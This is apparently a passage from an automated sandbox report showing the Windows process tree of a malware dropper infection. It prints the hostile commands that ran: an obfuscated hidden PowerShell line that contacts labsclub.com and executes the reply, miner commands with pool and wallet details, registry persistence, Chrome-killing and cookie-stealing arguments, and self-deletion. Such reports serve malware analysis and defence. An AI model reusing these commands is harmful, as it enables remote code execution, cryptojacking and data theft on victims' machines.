PID:4132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hzg3kajp.dji\askinstall31.exe & exit
15⤵
PID:6520

C:\Users\Admin\AppData\Local\Temp\hzg3kajp.dji\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\hzg3kajp.dji\askinstall31.exe
16⤵
PID:6984

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
17⤵
PID:4928

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
18⤵
- Kills process with taskkill
PID:6496

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bo0pyvot.5xw\toolspab1.exe & exit
15⤵
PID:6916

C:\Users\Admin\AppData\Local\Temp\bo0pyvot.5xw\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\bo0pyvot.5xw\toolspab1.exe
16⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\bo0pyvot.5xw\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\bo0pyvot.5xw\toolspab1.exe
17⤵
PID:3896

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5atuigig.ngc\GcleanerWW.exe /mixone & exit
15⤵
PID:7116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0kc5rbwc.f4n\setup_10.2_mix.exe & exit
15⤵
PID:5688

C:\Users\Admin\AppData\Local\Temp\0kc5rbwc.f4n\setup_10.2_mix.exe
C:\Users\Admin\AppData\Local\Temp\0kc5rbwc.f4n\setup_10.2_mix.exe
16⤵
PID:4240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxwvaapp.jrr\file.exe & exit
15⤵
PID:1372

C:\Users\Admin\AppData\Local\Temp\vxwvaapp.jrr\file.exe
C:\Users\Admin\AppData\Local\Temp\vxwvaapp.jrr\file.exe
16⤵
PID:2544

C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
17⤵
PID:4696

C:\Users\Admin\AppData\Local\Temp\6QSO7ANT1P\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\6QSO7ANT1P\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
18⤵
PID:6844

C:\Users\Admin\AppData\Local\Temp\6QSO7ANT1P\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\6QSO7ANT1P\multitimer.exe" 1 3.1617448156.60684cdc5033b 101
19⤵
PID:8188

C:\Users\Admin\AppData\Local\Temp\6QSO7ANT1P\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\6QSO7ANT1P\multitimer.exe" 2 3.1617448156.60684cdc5033b
20⤵
PID:6248

C:\Users\Admin\AppData\Local\Temp\21j50ezcavq\vict.exe
"C:\Users\Admin\AppData\Local\Temp\21j50ezcavq\vict.exe" /VERYSILENT /id=535
21⤵
PID:8968

C:\Users\Admin\AppData\Local\Temp\is-JIE1V.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JIE1V.tmp\vict.tmp" /SL5="$602EA,870426,780800,C:\Users\Admin\AppData\Local\Temp\21j50ezcavq\vict.exe" /VERYSILENT /id=535
22⤵
PID:8720

C:\Users\Admin\AppData\Local\Temp\u3duzufkz3n\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\u3duzufkz3n\cpyrix.exe" /VERYSILENT
21⤵
PID:9020

C:\Users\Admin\AppData\Local\Temp\4fq4rjseg4t\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\4fq4rjseg4t\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:8040

C:\Users\Admin\AppData\Local\Temp\is-B3PUQ.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B3PUQ.tmp\Setup3310.tmp" /SL5="$805B4,138429,56832,C:\Users\Admin\AppData\Local\Temp\4fq4rjseg4t\Setup3310.exe" /Verysilent /subid=577
22⤵
PID:8136

C:\Users\Admin\AppData\Local\Temp\t2hltkz4xq1\app.exe
"C:\Users\Admin\AppData\Local\Temp\t2hltkz4xq1\app.exe" /8-23
21⤵
PID:7860

C:\Users\Admin\AppData\Local\Temp\mqburez0zmh\0hfmfswovwi.exe
"C:\Users\Admin\AppData\Local\Temp\mqburez0zmh\0hfmfswovwi.exe" /ustwo INSTALL
21⤵
PID:8628

C:\Users\Admin\AppData\Local\Temp\UUU4HHWPSU\setups.exe
"C:\Users\Admin\AppData\Local\Temp\UUU4HHWPSU\setups.exe" ll
18⤵
PID:7524

C:\Users\Admin\AppData\Local\Temp\is-BB1MO.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BB1MO.tmp\setups.tmp" /SL5="$503D2,635399,250368,C:\Users\Admin\AppData\Local\Temp\UUU4HHWPSU\setups.exe" ll
19⤵
PID:7640

C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
17⤵
PID:7648

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
18⤵
PID:7556

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
19⤵
- Kills process with taskkill
PID:7364

C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
17⤵
PID:7908

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
18⤵
PID:6928

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
19⤵
PID:7720

C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
17⤵
PID:7232

C:\Users\Admin\AppData\Roaming\7E4A.tmp.exe
"C:\Users\Admin\AppData\Roaming\7E4A.tmp.exe"
18⤵
PID:8916

C:\Users\Admin\AppData\Roaming\7E4A.tmp.exe
"C:\Users\Admin\AppData\Roaming\7E4A.tmp.exe"
19⤵
PID:8384

C:\Users\Admin\AppData\Roaming\8540.tmp.exe
"C:\Users\Admin\AppData\Roaming\8540.tmp.exe"
18⤵
PID:8972

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
19⤵
PID:5864

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
19⤵
PID:8408

C:\Users\Admin\AppData\Roaming\85AF.tmp.exe
"C:\Users\Admin\AppData\Roaming\85AF.tmp.exe"
18⤵
PID:9000

C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
17⤵
PID:6844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k5j3shmd.rh5\f7c5e026.exe & exit
15⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\k5j3shmd.rh5\f7c5e026.exe
C:\Users\Admin\AppData\Local\Temp\k5j3shmd.rh5\f7c5e026.exe
16⤵
PID:6996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ppu1r0mu.rk0\app.exe /8-2222 & exit
15⤵
PID:4476

C:\Users\Admin\AppData\Local\Temp\ppu1r0mu.rk0\app.exe
C:\Users\Admin\AppData\Local\Temp\ppu1r0mu.rk0\app.exe /8-2222
16⤵
PID:8008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3hg0sg41.md2\Four.exe & exit
15⤵
PID:8292

C:\Users\Admin\AppData\Local\Temp\3hg0sg41.md2\Four.exe
C:\Users\Admin\AppData\Local\Temp\3hg0sg41.md2\Four.exe
16⤵
PID:5848

C:\Users\Admin\AppData\Local\Temp\ab-dd7dd-440-40d90-b25b3c19007ca\SHoximaedaejo.exe
"C:\Users\Admin\AppData\Local\Temp\ab-dd7dd-440-40d90-b25b3c19007ca\SHoximaedaejo.exe"
14⤵
PID:4740

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
11⤵
PID:4256

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
12⤵
PID:4400

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
13⤵
PID:5216

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
11⤵
PID:4300

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
12⤵
PID:592

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
13⤵
PID:5612

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
11⤵
PID:5656

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"
11⤵
PID:4104

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
12⤵
PID:4892

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
11⤵
PID:4416

C:\Users\Admin\AppData\Local\Temp\MX1JMC85MK\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\MX1JMC85MK\multitimer.exe" 0 306065bb10421b26.04333812 0 103
12⤵
PID:2200

C:\Users\Admin\AppData\Local\Temp\MX1JMC85MK\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\MX1JMC85MK\multitimer.exe" 1 3.1617447988.60684c34a401c 103
13⤵
PID:4308

C:\Users\Admin\AppData\Local\Temp\MX1JMC85MK\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\MX1JMC85MK\multitimer.exe" 2 3.1617447988.60684c34a401c
14⤵
PID:660

C:\Users\Admin\AppData\Local\Temp\wxnwq3bxdpl\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\wxnwq3bxdpl\vpn.exe" /silent /subid=482
15⤵
PID:6868

C:\Users\Admin\AppData\Local\Temp\is-I7GBB.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I7GBB.tmp\vpn.tmp" /SL5="$80302,15170975,270336,C:\Users\Admin\AppData\Local\Temp\wxnwq3bxdpl\vpn.exe" /silent /subid=482
16⤵
PID:7020

C:\Users\Admin\AppData\Local\Temp\uwqjhbrxyof\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\uwqjhbrxyof\cpyrix.exe" /VERYSILENT
15⤵
PID:7048

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
16⤵
PID:4268

C:\Windows\SysWOW64\at.exe
"C:\Windows\System32\at.exe"
17⤵
PID:7152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
17⤵
PID:6308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe
18⤵
PID:6080

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
16⤵
PID:6160

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
17⤵
PID:4544

C:\Users\Admin\AppData\Local\Temp\3w0nqmhfzkp\app.exe
"C:\Users\Admin\AppData\Local\Temp\3w0nqmhfzkp\app.exe" /8-23
15⤵
PID:7124

C:\Users\Admin\AppData\Local\Temp\3usmqcyc21w\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\3usmqcyc21w\Setup3310.exe" /Verysilent /subid=577
15⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\is-OSR0P.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OSR0P.tmp\Setup3310.tmp" /SL5="$30278,138429,56832,C:\Users\Admin\AppData\Local\Temp\3usmqcyc21w\Setup3310.exe" /Verysilent /subid=577
16⤵
PID:6284

C:\Users\Admin\AppData\Local\Temp\is-5LVSE.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5LVSE.tmp\Setup.exe" /Verysilent
17⤵
PID:7148

C:\Users\Admin\AppData\Local\Temp\0boyg1l5xgc\oak4y351sux.exe
"C:\Users\Admin\AppData\Local\Temp\0boyg1l5xgc\oak4y351sux.exe" /ustwo INSTALL
15⤵
PID:5580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "oak4y351sux.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\0boyg1l5xgc\oak4y351sux.exe" & exit
16⤵
PID:6836

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "oak4y351sux.exe" /f
17⤵
- Kills process with taskkill
PID:3708

C:\Users\Admin\AppData\Local\Temp\ww35ddgplyu\vict.exe
"C:\Users\Admin\AppData\Local\Temp\ww35ddgplyu\vict.exe" /VERYSILENT /id=535
15⤵
PID:3952

C:\Users\Admin\AppData\Local\Temp\FKJVJP6AJF\setups.exe
"C:\Users\Admin\AppData\Local\Temp\FKJVJP6AJF\setups.exe" ll
12⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\is-OE4QH.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OE4QH.tmp\setups.tmp" /SL5="$402B0,635399,250368,C:\Users\Admin\AppData\Local\Temp\FKJVJP6AJF\setups.exe" ll
13⤵
PID:5204

C:\Users\Admin\AppData\Local\Temp\ujb4alk2r1e\p3hrm1b0uwx.exe
"C:\Users\Admin\AppData\Local\Temp\ujb4alk2r1e\p3hrm1b0uwx.exe" /ustwo INSTALL
8⤵
PID:4948

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "p3hrm1b0uwx.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ujb4alk2r1e\p3hrm1b0uwx.exe" & exit
9⤵
PID:5268

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "p3hrm1b0uwx.exe" /f
10⤵
- Kills process with taskkill
PID:3800

C:\Users\Admin\AppData\Local\Temp\t12gr1pmn0b\zu34akadpok.exe
"C:\Users\Admin\AppData\Local\Temp\t12gr1pmn0b\zu34akadpok.exe" /VERYSILENT
8⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\is-BOGEQ.tmp\zu34akadpok.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BOGEQ.tmp\zu34akadpok.tmp" /SL5="$40252,2592217,780800,C:\Users\Admin\AppData\Local\Temp\t12gr1pmn0b\zu34akadpok.exe" /VERYSILENT
9⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\is-464H2.tmp\winlthsth.exe
"C:\Users\Admin\AppData\Local\Temp\is-464H2.tmp\winlthsth.exe"
10⤵
PID:5760

C:\Users\Admin\AppData\Local\Temp\a090stNzF.exe
"C:\Users\Admin\AppData\Local\Temp\a090stNzF.exe"
11⤵
PID:4276

C:\Users\Admin\AppData\Local\Temp\a090stNzF.exe
"C:\Users\Admin\AppData\Local\Temp\a090stNzF.exe"
12⤵
PID:5244

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:7016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
PID:4768

C:\Users\Admin\AppData\Local\Temp\yytdjkqnoas\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\yytdjkqnoas\cpyrix.exe" /VERYSILENT
8⤵
PID:5128

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
9⤵
PID:3424

C:\Windows\SysWOW64\at.exe
"C:\Windows\System32\at.exe"
10⤵
PID:4984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
10⤵
PID:4636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe
11⤵
PID:2692

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
9⤵
PID:4680

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
10⤵
PID:5192

C:\Users\Admin\AppData\Local\Temp\fk03loebecy\5gywzpnxxia.exe
"C:\Users\Admin\AppData\Local\Temp\fk03loebecy\5gywzpnxxia.exe"
8⤵
PID:5224

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\fk03loebecy\5gywzpnxxia.exe"
9⤵
PID:6124

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
10⤵
- Runs ping.exe
PID:5376

C:\Users\Admin\AppData\Local\Temp\n3h2z2zkvs0\m1e2yfpfpyd.exe
"C:\Users\Admin\AppData\Local\Temp\n3h2z2zkvs0\m1e2yfpfpyd.exe" /quiet SILENT=1 AF=756
8⤵
PID:5284

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\n3h2z2zkvs0\m1e2yfpfpyd.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\n3h2z2zkvs0\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617195598 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
9⤵
PID:5456

C:\Users\Admin\AppData\Local\Temp\xlps5nvfrzt\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\xlps5nvfrzt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
PID:5328

C:\Users\Admin\AppData\Local\Temp\is-1RN7E.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1RN7E.tmp\IBInstaller_97039.tmp" /SL5="$1035E,14574917,721408,C:\Users\Admin\AppData\Local\Temp\xlps5nvfrzt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
PID:5552

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-V1U60.tmp\{app}\microsoft.cab -F:* %ProgramData%
10⤵
PID:5732

C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-V1U60.tmp\{app}\microsoft.cab -F:* C:\ProgramData
11⤵
PID:5948

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^&param=
10⤵
PID:6448

C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
10⤵
PID:6956

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
10⤵
PID:2184

C:\Users\Admin\AppData\Local\Temp\is-V1U60.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-V1U60.tmp\{app}\chrome_proxy.exe"
10⤵
PID:4956

C:\Users\Admin\AppData\Local\Temp\51dlyzos3ex\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\51dlyzos3ex\vpn.exe" /silent /subid=482
8⤵
PID:5308

C:\Users\Admin\AppData\Local\Temp\is-SQOSD.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SQOSD.tmp\vpn.tmp" /SL5="$30282,15170975,270336,C:\Users\Admin\AppData\Local\Temp\51dlyzos3ex\vpn.exe" /silent /subid=482
9⤵
PID:5500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
10⤵
PID:4880

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
11⤵
PID:5856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
10⤵
PID:6548

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
11⤵
PID:6244

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
10⤵
PID:5564

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
10⤵
PID:4524

C:\Users\Admin\AppData\Local\Temp\4n0q112kdcz\app.exe
"C:\Users\Admin\AppData\Local\Temp\4n0q112kdcz\app.exe" /8-23
8⤵
PID:5248

C:\Users\Admin\AppData\Local\Temp\LHJIQ98FQG\setups.exe
"C:\Users\Admin\AppData\Local\Temp\LHJIQ98FQG\setups.exe" ll
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2064

C:\Users\Admin\AppData\Local\Temp\is-8TSL6.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8TSL6.tmp\setups.tmp" /SL5="$6003A,635399,250368,C:\Users\Admin\AppData\Local\Temp\LHJIQ98FQG\setups.exe" ll
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1488

C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3664

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:3768

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:816

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4728

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
6⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4916

C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
4⤵
- Executes dropped EXE
PID:4820

C:\Users\Admin\AppData\Roaming\D98D.tmp.exe
"C:\Users\Admin\AppData\Roaming\D98D.tmp.exe"
5⤵
PID:4944

C:\Users\Admin\AppData\Roaming\D98D.tmp.exe
"C:\Users\Admin\AppData\Roaming\D98D.tmp.exe"
6⤵
PID:4792

C:\Users\Admin\AppData\Roaming\DBFF.tmp.exe
"C:\Users\Admin\AppData\Roaming\DBFF.tmp.exe"
5⤵
PID:5080

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
6⤵
PID:4876

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
6⤵
PID:5236

C:\Users\Admin\AppData\Roaming\DCFA.tmp.exe
"C:\Users\Admin\AppData\Roaming\DCFA.tmp.exe"
5⤵
PID:3640

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\DCFA.tmp.exe
6⤵
PID:6164

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
7⤵
- Delays execution with timeout.exe
PID:5548

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
5⤵
PID:596

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:3712

C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
4⤵
PID:5292

C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
4⤵
PID:6300

C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
4⤵
PID:208

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Checks computer location settings
- Modifies registry class
PID:2344

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:6440

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5052

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2344

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4100

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4372

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
